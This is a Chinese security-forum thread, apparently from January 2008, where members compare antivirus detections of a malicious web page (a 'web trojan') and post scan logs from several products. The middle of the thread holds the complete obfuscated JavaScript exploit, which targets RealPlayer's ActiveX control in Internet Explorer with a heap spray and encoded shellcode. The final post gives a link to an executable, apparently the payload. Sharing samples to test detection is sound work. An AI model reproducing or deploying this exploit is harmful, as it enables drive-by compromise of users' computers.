又挂了一堆

moonsilver

又挂了一堆

llgiggs

Begin scan in 'C:\Documents and Settings\Administrator\桌面\real[1].rar'
C:\Documents and Settings\Administrator\桌面\real[1].rar
  [0] Archive type: RAR
  --> real[1].htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
      [INFO]      A backup was created as '47fa5a39.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!

IllusionWing

[扫描] [EmuHTML] 在 C:\Documents and Settings\Administrator\桌面\Virus\YB\real[1].htm 检测到 Possible.Encrypted

kkgh

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Hack.Exploit.Script.JS.Agent.gh

用户来源：互联网

软件版本：20.28.32

天灰

这个网马偶前天也抓到了

冷冷

<sCrIpT lAnGuAgE="jAvAsCrIpT">
var addr=["%75%06%74%04","%7f%a5%60","%4f%71%a4%60","%63%11%08%60","%63%11%04%60","%79%31%01%60","%79%31%09%60","%51%11%70%63"];function cike(){var user=navigator.userAgent.toLowerCase();if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return;if(user.indexOf("nt 5.")==-1)return;VulObject="IEaaR"+"PCaaatl.I"+"EaaaRP"+"Ctaaal.1";try{Real=new ActiveXObject(VulObject.replace(/a/g,""))}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");sdfdgdfg="";cvbcbb=unescape(addr[0]);for(i=0;i<32*148;i++)sdfdgdfg+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape(addr[1]);else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape(addr[2]);else return}else if(RealVersion=="6.0.14.544")ret=unescape(addr[3]);else if(RealVersion=="6.0.14.550")ret=unescape(addr[4]);else if(RealVersion=="6.0.14.552")ret=unescape(addr[5]);else if(RealVersion!="6.0.14.543")ret=unescape(addr[6]);else if(RealVersion!="6.0.14.536")ret=unescape(addr[7]);else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}qwfgsg="LLLL\\XXXXXLD";Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSTTnvYUcPs3U6NRC2OPmfOpbpoPlsUvN3UQhSUOpS0";xcbfcxn=sdfdgdfg+qwfgsg+Shell;temp=0x8000;while(xcbfcxn.length<temp)xcbfcxn+="lizhen";var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];Real.Import(arr1[Math.floor(Math.random()*6)],xcbfcxn,"123456456",0,0)}cike();
</script>

以前发过啦

可惜我还不会解出来

[ 本帖最后由 冷_冷 于 2008-1-25 11:51 编辑 ]

醉一生爱妍

對於網頁之類的NOD一向都是飄的

dd2006

扫描系统区域...
扫描所选择的目录和文件...
扫描目录 C:\Documents and Settings\Administrato\桌面\1
对象: real[1].htm
        在压缩档案里: C:\Documents and Settings\Administrato\桌面\1\real[1].rar
        状态: 已发现病毒
        病毒: Exploit.JS.RealPlr.bm (KAV 引擎)
对象: real[1].rar
        路径: C:\Documents and Settings\Administrato\桌面\1
        状态: 已发现病毒
        病毒: Exploit.JS.RealPlr.bm (KAV 引擎)
分析完成: 1/25/2008 11:54
    已扫描 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件

ck893210

http://d.93se.com/bole.exe

samsinn